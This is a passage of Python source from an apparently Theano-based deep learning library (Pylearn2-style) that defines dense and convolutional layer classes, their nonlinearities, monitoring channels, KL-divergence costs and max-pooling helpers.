state = self.fprop(state_below)
mx = state.max(axis=0)
mean = state.mean(axis=0)
mn = state.min(axis=0)
rg = mx - mn
rval['range_x_max_u'] = rg.max()
rval['range_x_mean_u'] = rg.mean()
rval['range_x_min_u'] = rg.min()
rval['max_x_max_u'] = mx.max()
rval['max_x_mean_u'] = mx.mean()
rval['max_x_min_u'] = mx.min()
rval['mean_x_max_u'] = mean.max()
rval['mean_x_mean_u'] = mean.mean()
rval['mean_x_min_u'] = mean.min()
rval['min_x_max_u'] = mn.max()
rval['min_x_mean_u'] = mn.mean()
rval['min_x_min_u'] = mn.min()
return rval
def _linear_part(self, state_below):
"""
Parameters
----------
state_below : member of input_space
Returns
-------
output : theano matrix
Affine transformation of state_below
"""
self.input_space.validate(state_below)
if self.requires_reformat:
state_below = self.input_space.format_as(state_below,
self.desired_space)
z = self.transformer.lmul(state_below)
if self.use_bias:
z += self.b
if self.layer_name is not None:
z.name = self.layer_name + '_z'
return z
@wraps(Layer.fprop)
def fprop(self, state_below):
p = self._linear_part(state_below)
return p
@wraps(Layer.cost)
def cost(self, Y, Y_hat):
return self.cost_from_cost_matrix(self.cost_matrix(Y, Y_hat))
@wraps(Layer.cost_from_cost_matrix)
def cost_from_cost_matrix(self, cost_matrix):
return cost_matrix.sum(axis=1).mean()
@wraps(Layer.cost_matrix)
def cost_matrix(self, Y, Y_hat):
if(self.use_abs_loss):
return T.abs_(Y - Y_hat)
else:
return T.sqr(Y - Y_hat)
class Tanh(Linear):
"""
A layer that performs an affine transformation of its (vectorial)
input followed by a hyperbolic tangent elementwise nonlinearity.
Parameters
----------
kwargs : dict
Keyword arguments to pass through to `Linear` class constructor.
"""
@wraps(Layer.fprop)
def fprop(self, state_below):
p = self._linear_part(state_below)
p = T.tanh(p)
return p
@wraps(Layer.cost)
def cost(self, *args, **kwargs):
raise NotImplementedError()
class Sigmoid(Linear):
"""
A layer that performs an affine transformation of its
input followed by a logistic sigmoid elementwise nonlinearity.
Parameters
----------
monitor_style : string
Values can be any of ['detection', 'one_hot_class',
'bit_vector_class']
'detection' is the default.
- 'detection' : get_monitor_from_state makes no assumptions about
target, reports info about how good model is at
detecting positive bits.
This will monitor precision, recall, and F1 score
based on a detection threshold of 0.5. Note that
these quantities are computed *per-minibatch* and
averaged together. Unless your entire monitoring
dataset fits in one minibatch, this is not the same
as the true F1 score, etc., and will usually
seriously overestimate your performance.
- 'one_hot_class' : get_monitor_from_state assumes target is
one-hot class indicator, even though you're training the
model as k independent sigmoids. Gives info on how
good the argmax over the sigmoids behaves as a classifier.
- 'bit_vector_class' : get_monitor_from_state treats each
sigmoid as predicting a 1 iff its value is > 0.5. Each
example is counted as correct iff all of the bits in its
target are predicted correctly.
This includes as a special case the situation where the
target is a single 0 or 1 label.
- 'classification' : deprecated; originally this string was
used for 'one_hot_class', then due to a miscommunication
it was changed to be used for 'bit_vector_class'.
kwargs : dict
Passed through to the Layer class constructor
"""
def __init__(self, monitor_style='detection', **kwargs):
super(Sigmoid, self).__init__(**kwargs)
if monitor_style == 'classification':
monitor_style = 'bit_vector_class'
warnings.warn("The 'classification' monitor style is deprecated."
" Switch to 'bit_vector_class' (or possibly"
" 'one_hot_class' if your code predates 8f4b62b3df)."
" 'classification' may be removed on or after "
"2015-04-21.")
assert monitor_style in ['one_hot_class', 'bit_vector_class',
'detection']
self.monitor_style = monitor_style
@wraps(Layer.fprop)
def fprop(self, state_below):
p = self._linear_part(state_below)
p = T.nnet.sigmoid(p)
return p
@wraps(Layer.cost)
def cost(self, Y, Y_hat):
"""
Returns a batch (vector) of
mean across units of KL divergence for each example.
Parameters
----------
Y : theano.gof.Variable
Targets
Y_hat : theano.gof.Variable
Output of `fprop`
mean across units, mean across batch of KL divergence
Notes
-----
Uses KL(P || Q) where P is defined by Y and Q is defined by Y_hat
Currently Y must be purely binary. If it's not, you'll still
get the right gradient, but the value in the monitoring channel
will be wrong.
Y_hat must be generated by fprop, i.e., it must be a symbolic
sigmoid.
p log p - p log q + (1-p) log (1-p) - (1-p) log (1-q)
For binary p, some terms drop out:
- p log q - (1-p) log (1-q)
- p log sigmoid(z) - (1-p) log sigmoid(-z)
p softplus(-z) + (1-p) softplus(z)
"""
total = self.kl(Y=Y, Y_hat=Y_hat)
ave = total.mean()
return ave
def kl(self, Y, Y_hat):
"""
Computes the KL divergence.
Parameters
----------
Y : Variable
targets for the sigmoid outputs. Currently Y must be purely binary.
If it's not, you'll still get the right gradient, but the
value in the monitoring channel will be wrong.
Y_hat : Variable
predictions made by the sigmoid layer. Y_hat must be generated by
fprop, i.e., it must be a symbolic sigmoid.
Returns
-------
ave : Variable
average kl divergence between Y and Y_hat.
Notes
-----
Warning: This function expects a sigmoid nonlinearity in the
output layer and it uses kl function under pylearn2/expr/nnet/.
Returns a batch (vector) of mean across units of KL
divergence for each example,
KL(P || Q) where P is defined by Y and Q is defined by Y_hat:
p log p - p log q + (1-p) log (1-p) - (1-p) log (1-q)
For binary p, some terms drop out:
- p log q - (1-p) log (1-q)
- p log sigmoid(z) - (1-p) log sigmoid(-z)
p softplus(-z) + (1-p) softplus(z)
"""
batch_axis = self.output_space.get_batch_axis()
div = kl(Y=Y, Y_hat=Y_hat, batch_axis=batch_axis)
return div
@wraps(Layer.cost_matrix)
def cost_matrix(self, Y, Y_hat):
rval = elemwise_kl(Y, Y_hat)
assert rval.ndim == 2
return rval
def get_detection_channels_from_state(self, state, target):
"""
Returns monitoring channels when using the layer to do detection
of binary events.
Parameters
----------
state : theano.gof.Variable
Output of `fprop`
target : theano.gof.Variable
The targets from the dataset
Returns
-------
channels : OrderedDict
Dictionary mapping channel names to Theano channel values.
"""
rval = OrderedDict()
y_hat = state > 0.5
y = target > 0.5
wrong_bit = T.cast(T.neq(y, y_hat), state.dtype)
rval['01_loss'] = wrong_bit.mean()
rval['kl'] = self.cost(Y_hat=state, Y=target)
y = T.cast(y, state.dtype)
y_hat = T.cast(y_hat, state.dtype)
tp = (y * y_hat).sum()
fp = ((1 - y) * y_hat).sum()
precision = compute_precision(tp, fp)
recall = compute_recall(y, tp)
f1 = compute_f1(precision, recall)
rval['precision'] = precision
rval['recall'] = recall
rval['f1'] = f1
tp = (y * y_hat).sum(axis=0)
fp = ((1 - y) * y_hat).sum(axis=0)
precision = compute_precision(tp, fp)
rval['per_output_precision_max'] = precision.max()
rval['per_output_precision_mean'] = precision.mean()
rval['per_output_precision_min'] = precision.min()
recall = compute_recall(y, tp)
rval['per_output_recall_max'] = recall.max()
rval['per_output_recall_mean'] = recall.mean()
rval['per_output_recall_min'] = recall.min()
f1 = compute_f1(precision, recall)
rval['per_output_f1_max'] = f1.max()
rval['per_output_f1_mean'] = f1.mean()
rval['per_output_f1_min'] = f1.min()
return rval
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
rval = super(Sigmoid, self).get_layer_monitoring_channels(
state=state, targets=targets)
if (targets is not None) and \
((state_below is not None) or (state is not None)):
if state is None:
state = self.fprop(state_below)
if self.monitor_style == 'detection':
rval.update(self.get_detection_channels_from_state(state,
targets))
elif self.monitor_style == 'one_hot_class':
# For this monitor style, we know (by assumption) that
# exactly one bit is always on, so we pick
# the single most likely bit under the model, regardless
# of whether its probability exceeds 0.5
prediction = state.argmax(axis=1)
labels = targets.argmax(axis=1)
incorrect = T.neq(prediction, labels)
misclass = T.cast(incorrect, config.floatX).mean()
rval['misclass'] = misclass
else:
assert self.monitor_style == 'bit_vector_class'
# Threshold Y_hat at 0.5.
prediction = T.gt(state, 0.5)
# If even one feature is wrong for a given training example,
# it's considered incorrect, so we max over columns.
incorrect = T.neq(targets, prediction).max(axis=1)
rval['misclass'] = T.cast(incorrect, config.floatX).mean()
return rval
class RectifiedLinear(Linear):
"""
Rectified linear MLP layer (Glorot and Bengio 2011).
Parameters
----------
left_slope : float
The slope the line should have left of 0.
kwargs : dict
Keyword arguments to pass to `Linear` class constructor.
"""
def __init__(self, left_slope=0.0, **kwargs):
super(RectifiedLinear, self).__init__(**kwargs)
self.left_slope = left_slope
@wraps(Layer.fprop)
def fprop(self, state_below):
p = self._linear_part(state_below)
# Original: p = p * (p > 0.) + self.left_slope * p * (p < 0.)
# T.switch is faster.
# For details, see benchmarks in
# pylearn2/scripts/benchmark/time_relu.py
p = T.switch(p > 0., p, self.left_slope * p)
return p
@wraps(Layer.cost)
def cost(self, *args, **kwargs):
raise NotImplementedError()
class Softplus(Linear):
"""
An MLP layer using the softplus nonlinearity
h = log(1 + exp(Wx + b))
Parameters
----------
kwargs : dict
Keyword arguments to `Linear` constructor.
"""
def __init__(self, **kwargs):
super(Softplus, self).__init__(**kwargs)
@wraps(Layer.fprop)
def fprop(self, state_below):
p = self._linear_part(state_below)
p = T.nnet.softplus(p)
return p
@wraps(Layer.cost)
def cost(self, *args, **kwargs):
raise NotImplementedError()
class SpaceConverter(Layer):
"""
A Layer with no parameters that converts the input from
one space to another.
Parameters
----------
layer_name : str
Name of the layer.
output_space : Space
The space to convert to.
"""
def __init__(self, layer_name, output_space):
super(SpaceConverter, self).__init__()
self.__dict__.update(locals())
del self.self
self._params = []
@wraps(Layer.set_input_space)
def set_input_space(self, space):
self.input_space = space
@wraps(Layer.fprop)
def fprop(self, state_below):
return self.input_space.format_as(state_below, self.output_space)
class ConvNonlinearity(object):
"""
Abstract convolutional nonlinearity class.
"""
def apply(self, linear_response):
"""
Applies the nonlinearity over the convolutional layer.
Parameters
----------
linear_response: Variable
linear response of the layer.
Returns
-------
p: Variable
the response of the layer after the activation function
is applied over.
"""
p = linear_response
return p
def _get_monitoring_channels_for_activations(self, state):
"""
Computes the monitoring channels which does not require targets.
Parameters
----------
state : member of self.output_space
A minibatch of states that this Layer took on during fprop.
Provided externally so that we don't need to make a second
expression for it. This helps keep the Theano graph smaller
so that function compilation runs faster.
Returns
-------
rval : OrderedDict
A dictionary mapping channel names to monitoring channels of
interest for this layer.
"""
rval = OrderedDict({})
mx = state.max(axis=0)
mean = state.mean(axis=0)
mn = state.min(axis=0)
rg = mx - mn
rval['range_x_max_u'] = rg.max()
rval['range_x_mean_u'] = rg.mean()
rval['range_x_min_u'] = rg.min()
rval['max_x_max_u'] = mx.max()
rval['max_x_mean_u'] = mx.mean()
rval['max_x_min_u'] = mx.min()
rval['mean_x_max_u'] = mean.max()
rval['mean_x_mean_u'] = mean.mean()
rval['mean_x_min_u'] = mean.min()
rval['min_x_max_u'] = mn.max()
rval['min_x_mean_u'] = mn.mean()
rval['min_x_min_u'] = mn.min()
return rval
def get_monitoring_channels_from_state(self, state, target,
cost_fn=None):
"""
Override the default get_monitoring_channels_from_state function.
Parameters
----------
state : member of self.output_space
A minibatch of states that this Layer took on during fprop.
Provided externally so that we don't need to make a second
expression for it. This helps keep the Theano graph smaller
so that function compilation runs faster.
target : member of self.output_space
Should be None unless this is the last layer.
If specified, it should be a minibatch of targets for the
last layer.
cost_fn : theano computational graph or None
This is the theano computational graph of a cost function.
Returns
-------
rval : OrderedDict
A dictionary mapping channel names to monitoring channels of
interest for this layer.
"""
rval = self._get_monitoring_channels_for_activations(state)
return rval
class IdentityConvNonlinearity(ConvNonlinearity):
"""
Linear convolutional nonlinearity class.
"""
def __init__(self):
self.non_lin_name = "linear"
@wraps(ConvNonlinearity.get_monitoring_channels_from_state)
def get_monitoring_channels_from_state(self,
state,
target,
cost_fn=False):
rval = super(IdentityConvNonlinearity,
self).get_monitoring_channels_from_state(state,
target,
cost_fn)
if target is not None:
prediction = T.gt(state, 0.5)
incorrect = T.new(target, prediction).max(axis=1)
rval["misclass"] = T.cast(incorrect, config.floatX).mean()
return rval
class RectifierConvNonlinearity(ConvNonlinearity):
"""
A simple rectifier nonlinearity class for convolutional layers.
Parameters
----------
left_slope : float
The slope of the left half of the activation function.
"""
def __init__(self, left_slope=0.0):
"""
Parameters
----------
left_slope : float, optional
left slope for the linear response of the rectifier function.
default is 0.0.
"""
self.non_lin_name = "rectifier"
self.left_slope = left_slope
@wraps(ConvNonlinearity.apply)
def apply(self, linear_response):
"""
Applies the rectifier nonlinearity over the convolutional layer.
"""
p = linear_response * (linear_response > 0.) + self.left_slope *\
linear_response * (linear_response < 0.)
return p
class SigmoidConvNonlinearity(ConvNonlinearity):
"""
Sigmoid nonlinearity class for convolutional layers.
Parameters
----------
monitor_style : str, optional
default monitor_style is "classification".
This determines whether to do classification or detection.
"""
def __init__(self, monitor_style="classification"):
assert monitor_style in ['classification', 'detection']
self.monitor_style = monitor_style
self.non_lin_name = "sigmoid"
@wraps(ConvNonlinearity.apply)
def apply(self, linear_response):
"""
Applies the sigmoid nonlinearity over the convolutional layer.
"""
rval = OrderedDict()
p = T.nnet.sigmoid(linear_response)
return p
@wraps(ConvNonlinearity.get_monitoring_channels_from_state)
def get_monitoring_channels_from_state(self, state, target,
cost_fn=None):
rval = super(SigmoidConvNonlinearity,
self).get_monitoring_channels_from_state(state,
target,
cost_fn)
if target is not None:
y_hat = state > 0.5
y = target > 0.5
wrong_bit = T.cast(T.neq(y, y_hat), state.dtype)
rval['01_loss'] = wrong_bit.mean()
rval['kl'] = cost_fn(Y_hat=state, Y=target)
y = T.cast(y, state.dtype)
y_hat = T.cast(y_hat, state.dtype)
tp = (y * y_hat).sum()
fp = ((1 - y) * y_hat).sum()
precision = compute_precision(tp, fp)
recall = compute_recall(y, tp)
f1 = compute_f1(precision, recall)
rval['precision'] = precision
rval['recall'] = recall
rval['f1'] = f1
tp = (y * y_hat).sum(axis=[0, 1])
fp = ((1 - y) * y_hat).sum(axis=[0, 1])
precision = compute_precision(tp, fp)
rval['per_output_precision_max'] = precision.max()
rval['per_output_precision_mean'] = precision.mean()
rval['per_output_precision_min'] = precision.min()
recall = compute_recall(y, tp)
rval['per_output_recall_max'] = recall.max()
rval['per_output_recall_mean'] = recall.mean()
rval['per_output_recall_min'] = recall.min()
f1 = compute_f1(precision, recall)
rval['per_output_f1_max'] = f1.max()
rval['per_output_f1_mean'] = f1.mean()
rval['per_output_f1_min'] = f1.min()
return rval
class TanhConvNonlinearity(ConvNonlinearity):
"""
Tanh nonlinearity class for convolutional layers.
"""
def __init__(self):
self.non_lin_name = "tanh"
@wraps(ConvNonlinearity.apply)
def apply(self, linear_response):
"""
Applies the tanh nonlinearity over the convolutional layer.
"""
p = T.tanh(linear_response)
return p
class ConvElemwise(Layer):
"""
Generic convolutional elemwise layer.
Takes the ConvNonlinearity object as an argument and implements
convolutional layer with the specified nonlinearity.
This function can implement:
* Linear convolutional layer
* Rectifier convolutional layer
* Sigmoid convolutional layer
* Tanh convolutional layer
based on the nonlinearity argument that it recieves.
Parameters
----------
output_channels : int
The number of output channels the layer should have.
kernel_shape : tuple
The shape of the convolution kernel.
pool_shape : tuple
The shape of the spatial max pooling. A two-tuple of ints.
pool_stride : tuple
The stride of the spatial max pooling. Also must be square.
layer_name : str
A name for this layer that will be prepended to monitoring channels
related to this layer.
nonlinearity : object
An instance of a nonlinearity object which might be inherited
from the ConvNonlinearity class.
irange : float, optional
if specified, initializes each weight randomly in
U(-irange, irange)
border_mode : str, optional
A string indicating the size of the output:
- "full" : The output is the full discrete linear convolution of the
inputs.
- "valid" : The output consists only of those elements that do not
rely on the zero-padding. (Default)
sparse_init : WRITEME
include_prob : float, optional
probability of including a weight element in the set of weights
initialized to U(-irange, irange). If not included it is initialized
to 1.0.
init_bias : float, optional
All biases are initialized to this number. Default is 0.
W_lr_scale : float or None
The learning rate on the weights for this layer is multiplied by this
scaling factor
b_lr_scale : float or None
The learning rate on the biases for this layer is multiplied by this
scaling factor
max_kernel_norm : float or None
If specified, each kernel is constrained to have at most this norm.
pool_type : str or None
The type of the pooling operation performed the convolution.
Default pooling type is max-pooling.
tied_b : bool, optional
If true, all biases in the same channel are constrained to be the
same as each other. Otherwise, each bias at each location is
learned independently. Default is true.
detector_normalization : callable or None
See `output_normalization`.
If pooling argument is not provided, detector_normalization
is not applied on the layer.
output_normalization : callable or None
if specified, should be a callable object. the state of the
network is optionally replaced with normalization(state) at each
of the 3 points in processing:
- detector: the maxout units can be normalized prior to the
spatial pooling
- output: the output of the layer, after sptial pooling, can
be normalized as well
kernel_stride : 2-tuple of ints, optional
The stride of the convolution kernel. Default is (1, 1).
"""
def __init__(self,
output_channels,
kernel_shape,
layer_name,
nonlinearity,
irange=None,
border_mode='valid',
sparse_init=None,
include_prob=1.0,
init_bias=0.,
W_lr_scale=None,
b_lr_scale=None,
max_kernel_norm=None,
pool_type=None,
pool_shape=None,
pool_stride=None,
tied_b=None,
detector_normalization=None,
output_normalization=None,
kernel_stride=(1, 1),
monitor_style="classification"):
super(ConvElemwise, self).__init__()
if (irange is None) and (sparse_init is None):
raise AssertionError("You should specify either irange or "
"sparse_init when calling the constructor of "
"ConvElemwise.")
elif (irange is not None) and (sparse_init is not None):
raise AssertionError("You should specify either irange or "
"sparse_init when calling the constructor of "
"ConvElemwise and not both.")
if pool_type is not None:
assert pool_shape is not None, (
"You should specify the shape of "
"the spatial %s-pooling." % pool_type)
assert pool_stride is not None, (
"You should specify the strides of "
"the spatial %s-pooling." % pool_type)
assert nonlinearity is not None
self.nonlin = nonlinearity
self.__dict__.update(locals())
assert monitor_style in ['classification', 'detection'], (
"%s.monitor_style should be either"
"detection or classification" % self.__class__.__name__)
del self.self
def initialize_transformer(self, rng):
"""
This function initializes the transformer of the class. Re-running
this function will reset the transformer.
Parameters
----------
rng : object
random number generator object.
"""
if self.irange is not None:
assert self.sparse_init is None
self.transformer = conv2d.make_random_conv2D(
irange=self.irange,
input_space=self.input_space,
output_space=self.detector_space,
kernel_shape=self.kernel_shape,
subsample=self.kernel_stride,
border_mode=self.border_mode,
rng=rng)
elif self.sparse_init is not None:
self.transformer = conv2d.make_sparse_random_conv2D(
num_nonzero=self.sparse_init,
input_space=self.input_space,
output_space=self.detector_space,
kernel_shape=self.kernel_shape,
subsample=self.kernel_stride,
border_mode=self.border_mode,
rng=rng)
def initialize_output_space(self):
"""
Initializes the output space of the ConvElemwise layer by taking
pooling operator and the hyperparameters of the convolutional layer
into consideration as well.
"""
dummy_batch_size = self.mlp.batch_size
if dummy_batch_size is None:
dummy_batch_size = 2
dummy_detector =\
sharedX(self.detector_space.get_origin_batch(dummy_batch_size))
if self.pool_type is not None:
assert self.pool_type in ['max', 'mean']
if self.pool_type == 'max':
dummy_p = max_pool(bc01=dummy_detector,
pool_shape=self.pool_shape,
pool_stride=self.pool_stride,
image_shape=self.detector_space.shape)
elif self.pool_type == 'mean':
dummy_p = mean_pool(bc01=dummy_detector,
pool_shape=self.pool_shape,
pool_stride=self.pool_stride,
image_shape=self.detector_space.shape)
dummy_p = dummy_p.eval()
self.output_space = Conv2DSpace(shape=[dummy_p.shape[2],
dummy_p.shape[3]],
num_channels=self.output_channels,
axes=('b', 'c', 0, 1))
else:
dummy_detector = dummy_detector.eval()
self.output_space = Conv2DSpace(shape=[dummy_detector.shape[2],
dummy_detector.shape[3]],
num_channels=self.output_channels,
axes=('b', 'c', 0, 1))
logger.info('Output space: {0}'.format(self.output_space.shape))
@wraps(Layer.set_input_space)
def set_input_space(self, space):
""" Note: this function will reset the parameters! """
self.input_space = space
if not isinstance(space, Conv2DSpace):
raise BadInputSpaceError(self.__class__.__name__ +
".set_input_space "
"expected a Conv2DSpace, got " +
str(space) + " of type " +
str(type(space)))
rng = self.mlp.rng
if self.border_mode == 'valid':
output_shape = [int((self.input_space.shape[0]
- self.kernel_shape[0])
/ self.kernel_stride[0]) + 1,
int((self.input_space.shape[1]
- self.kernel_shape[1])
/ self.kernel_stride[1]) + 1]
elif self.border_mode == 'full':
output_shape = [int((self.input_space.shape[0]
+ self.kernel_shape[0])
/ self.kernel_stride[0]) - 1,
int((self.input_space.shape[1]
+ self.kernel_shape[1])
/ self.kernel_stride[1]) - 1]
self.detector_space = Conv2DSpace(shape=output_shape,
num_channels=self.output_channels,
axes=('b', 'c', 0, 1))
self.initialize_transformer(rng)
W, = self.transformer.get_params()
W.name = self.layer_name + '_W'
if self.tied_b:
self.b = sharedX(np.zeros((self.detector_space.num_channels)) +
self.init_bias)
else:
self.b = sharedX(self.detector_space.get_origin() + self.init_bias)
self.b.name = self.layer_name + '_b'
logger.info('Input shape: {0}'.format(self.input_space.shape))
logger.info('Detector space: {0}'.format(self.detector_space.shape))
self.initialize_output_space()
@wraps(Layer._modify_updates)
def _modify_updates(self, updates):
if self.max_kernel_norm is not None:
W, = self.transformer.get_params()
if W in updates:
updated_W = updates[W]
row_norms = T.sqrt(T.sum(T.sqr(updated_W), axis=(1, 2, 3)))
desired_norms = T.clip(row_norms, 0, self.max_kernel_norm)
updates[W] = updated_W * (
desired_norms /
(1e-7 + row_norms)).dimshuffle(0, 'x', 'x', 'x')
@wraps(Layer.get_params)
def get_params(self):
assert self.b.name is not None
W, = self.transformer.get_params()
assert W.name is not None
rval = self.transformer.get_params()
assert not isinstance(rval, set)
rval = list(rval)
assert self.b not in rval
rval.append(self.b)
return rval
@wraps(Layer.get_weight_decay)
def get_weight_decay(self, coeff):
if isinstance(coeff, str):
coeff = float(coeff)
assert isinstance(coeff, float) or hasattr(coeff, 'dtype')
W, = self.transformer.get_params()
return coeff * T.sqr(W).sum()
@wraps(Layer.get_l1_weight_decay)
def get_l1_weight_decay(self, coeff):
if isinstance(coeff, str):
coeff = float(coeff)
assert isinstance(coeff, float) or hasattr(coeff, 'dtype')
W, = self.transformer.get_params()
return coeff * abs(W).sum()
@wraps(Layer.set_weights)
def set_weights(self, weights):
W, = self.transformer.get_params()
W.set_value(weights)
@wraps(Layer.set_biases)
def set_biases(self, biases):
self.b.set_value(biases)
@wraps(Layer.get_biases)
def get_biases(self):
return self.b.get_value()
@wraps(Layer.get_weights_format)
def get_weights_format(self):
return ('v', 'h')
@wraps(Layer.get_lr_scalers)
def get_lr_scalers(self):
if not hasattr(self, 'W_lr_scale'):
self.W_lr_scale = None
if not hasattr(self, 'b_lr_scale'):
self.b_lr_scale = None
rval = OrderedDict()
if self.W_lr_scale is not None:
W, = self.transformer.get_params()
rval[W] = self.W_lr_scale
if self.b_lr_scale is not None:
rval[self.b] = self.b_lr_scale
return rval
@wraps(Layer.get_weights_topo)
def get_weights_topo(self):
outp, inp, rows, cols = range(4)
raw = self.transformer._filters.get_value()
return np.transpose(raw, (outp, rows, cols, inp))
@wraps(Layer.get_layer_monitoring_channels)
def get_layer_monitoring_channels(self, state_below=None,
state=None, targets=None):
W, = self.transformer.get_params()
assert W.ndim == 4
sq_W = T.sqr(W)
row_norms = T.sqrt(sq_W.sum(axis=(1, 2, 3)))
rval = OrderedDict([
('kernel_norms_min', row_norms.min()),
('kernel_norms_mean', row_norms.mean()),
('kernel_norms_max', row_norms.max()),
])
cst = self.cost
orval = self.nonlin.get_monitoring_channels_from_state(state,
targets,
cost_fn=cst)
rval.update(orval)
return rval
@wraps(Layer.fprop)
def fprop(self, state_below):
self.input_space.validate(state_below)
z = self.transformer.lmul(state_below)
if not hasattr(self, 'tied_b'):
self.tied_b = False
if self.tied_b:
b = self.b.dimshuffle('x', 0, 'x', 'x')
else:
b = self.b.dimshuffle('x', 0, 1, 2)
z = z + b
d = self.nonlin.apply(z)
if self.layer_name is not None:
d.name = self.layer_name + '_z'
self.detector_space.validate(d)
if self.pool_type is not None:
if not hasattr(self, 'detector_normalization'):
self.detector_normalization = None
if self.detector_normalization:
d = self.detector_normalization(d)
assert self.pool_type in ['max', 'mean'], ("pool_type should be"
"either max or mean"
"pooling.")
if self.pool_type == 'max':
p = max_pool(bc01=d, pool_shape=self.pool_shape,
pool_stride=self.pool_stride,
image_shape=self.detector_space.shape)
elif self.pool_type == 'mean':
p = mean_pool(bc01=d, pool_shape=self.pool_shape,
pool_stride=self.pool_stride,
image_shape=self.detector_space.shape)
self.output_space.validate(p)
else:
p = d
if not hasattr(self, 'output_normalization'):
self.output_normalization = None
if self.output_normalization:
p = self.output_normalization(p)
return p
def cost(self, Y, Y_hat):
"""
Cost for convnets is hardcoded to be the cost for sigmoids.
TODO: move the cost into the non-linearity class.
Parameters
----------
Y : theano.gof.Variable
Output of `fprop`
Y_hat : theano.gof.Variable
Targets
Returns
-------
cost : theano.gof.Variable
0-D tensor describing the cost
Notes
-----
Cost mean across units, mean across batch of KL divergence
KL(P || Q) where P is defined by Y and Q is defined by Y_hat
KL(P || Q) = p log p - p log q + (1-p) log (1-p) - (1-p) log (1-q)
"""
assert self.nonlin.non_lin_name == "sigmoid", ("ConvElemwise "
"supports "
"cost function "
"for only "
"sigmoid layer "
"for now.")
batch_axis = self.output_space.get_batch_axis()
ave_total = kl(Y=Y, Y_hat=Y_hat, batch_axis=batch_axis)
ave = ave_total.mean()
return ave
class ConvRectifiedLinear(ConvElemwise):
"""
A convolutional rectified linear layer, based on theano's B01C
formatted convolution.
Parameters
----------
output_channels : int
The number of output channels the layer should have.
kernel_shape : tuple
The shape of the convolution kernel.
pool_shape : tuple
The shape of the spatial max pooling. A two-tuple of ints.
pool_stride : tuple
The stride of the spatial max pooling. Also must be square.
layer_name : str
A name for this layer that will be prepended to monitoring channels
related to this layer.
irange : float
if specified, initializes each weight randomly in
U(-irange, irange)
border_mode : str
A string indicating the size of the output:
- "full" : The output is the full discrete linear convolution of the
inputs.
- "valid" : The output consists only of those elements that do not
rely on the zero-padding. (Default)
include_prob : float
probability of including a weight element in the set of weights
initialized to U(-irange, irange). If not included it is initialized
to 0.
init_bias : float
All biases are initialized to this number
W_lr_scale : float
The learning rate on the weights for this layer is multiplied by this
scaling factor
b_lr_scale : float
The learning rate on the biases for this layer is multiplied by this
scaling factor
left_slope : float
The slope of the left half of the activation function
max_kernel_norm : float
If specifed, each kernel is constrained to have at most this norm.
pool_type :
The type of the pooling operation performed the the convolution.
Default pooling type is max-pooling.
tied_b : bool
If true, all biases in the same channel are constrained to be the
same as each other. Otherwise, each bias at each location is
learned independently.
detector_normalization : callable
See `output_normalization`
output_normalization : callable
if specified, should be a callable object. the state of the
network is optionally replaced with normalization(state) at each
of the 3 points in processing:
- detector: the rectifier units can be normalized prior to the
spatial pooling
- output: the output of the layer, after spatial pooling, can
be normalized as well
kernel_stride : tuple
The stride of the convolution kernel. A two-tuple of ints.
"""
def __init__(self,
output_channels,
kernel_shape,
pool_shape,
pool_stride,
layer_name,
irange=None,
border_mode='valid',
sparse_init=None,
include_prob=1.0,
init_bias=0.,
W_lr_scale=None,
b_lr_scale=None,
left_slope=0.0,
max_kernel_norm=None,
pool_type='max',
tied_b=False,
detector_normalization=None,
output_normalization=None,
kernel_stride=(1, 1),
monitor_style="classification"):
nonlinearity = RectifierConvNonlinearity(left_slope)
if (irange is None) and (sparse_init is None):
raise AssertionError("You should specify either irange or "
"sparse_init when calling the constructor of "
"ConvRectifiedLinear.")
elif (irange is not None) and (sparse_init is not None):
raise AssertionError("You should specify either irange or "
"sparse_init when calling the constructor of "
"ConvRectifiedLinear and not both.")
# Alias the variables for pep8
mkn = max_kernel_norm
dn = detector_normalization
on = output_normalization
super(ConvRectifiedLinear, self).__init__(output_channels,
kernel_shape,
layer_name,
nonlinearity,
irange=irange,
border_mode=border_mode,
sparse_init=sparse_init,
include_prob=include_prob,
init_bias=init_bias,
W_lr_scale=W_lr_scale,
b_lr_scale=b_lr_scale,
pool_shape=pool_shape,
pool_stride=pool_stride,
max_kernel_norm=mkn,
pool_type=pool_type,
tied_b=tied_b,
detector_normalization=dn,
output_normalization=on,
kernel_stride=kernel_stride,
monitor_style=monitor_style)
def pool_dnn(bc01, pool_shape, pool_stride, mode='max'):
"""
cuDNN pooling op.
Parameters
----------
bc01 : theano tensor
Minibatch in format (batch size, channels, rows, cols).
pool_shape : tuple
Shape of the pool region (rows, cols).
pool_stride : tuple
Strides between pooling regions (row stride, col stride).
mode : str
Flag for `mean` or `max` pooling.
Returns
-------
mx : theano tensor
The output of pooling applied to `bc01`.
"""
assert mode in ['max', 'mean']
if mode == 'mean':
raise NotImplementedError('Mean pooling is not implemented '
'in Pylearn2 using cuDNN as of '
'January 19th, 2015.')
mx = dnn_pool(bc01, tuple(pool_shape), tuple(pool_stride), mode)
return mx
def max_pool(bc01, pool_shape, pool_stride, image_shape, try_dnn=True):
"""
Theano's max pooling op only supports pool_stride = pool_shape
so here we have a graph that does max pooling with strides
Parameters
----------
bc01 : theano tensor
minibatch in format (batch size, channels, rows, cols)
pool_shape : tuple
shape of the pool region (rows, cols)
pool_stride : tuple
strides between pooling regions (row stride, col stride)
image_shape : tuple
avoid doing some of the arithmetic in theano
try_dnn : bool
Flag to set cuDNN use (default: True).
Returns
-------
pooled : theano tensor
The output of pooling applied to `bc01`
See Also
--------
max_pool_c01b : Same functionality but with ('c', 0, 1, 'b') axes
sandbox.cuda_convnet.pool.max_pool_c01b : Same functionality as
`max_pool_c01b` but GPU-only and considerably faster.
mean_pool : Mean pooling instead of max pooling
"""
mx = None
r, c = image_shape
pr, pc = pool_shape
rs, cs = pool_stride
assert pr <= r
assert pc <= c
name = bc01.name
if name is None:
name = 'anon_bc01'
if try_dnn and bc01.dtype == "float32":
use_dnn = dnn_available()
else:
use_dnn = False
if pool_shape == pool_stride and not use_dnn:
mx = max_pool_2d(bc01, pool_shape, False)
mx.name = 'max_pool(' + name + ')'
return mx
# Compute index in pooled space of last needed pool
# (needed = each input pixel must appear in at least one pool)
def last_pool(im_shp, p_shp, p_strd):
rval = int(np.ceil(float(im_shp - p_shp) / p_strd))
assert p_strd * rval + p_shp >= im_shp
assert p_strd * (rval - 1) + p_shp < im_shp
# Catch case where p_strd > p_shp causes pool
# to be set outside of im_shp.
if p_strd * rval >= im_shp:
rval -= 1
return rval
# Compute starting row of the last pool
last_pool_r = last_pool(image_shape[0],
pool_shape[0],
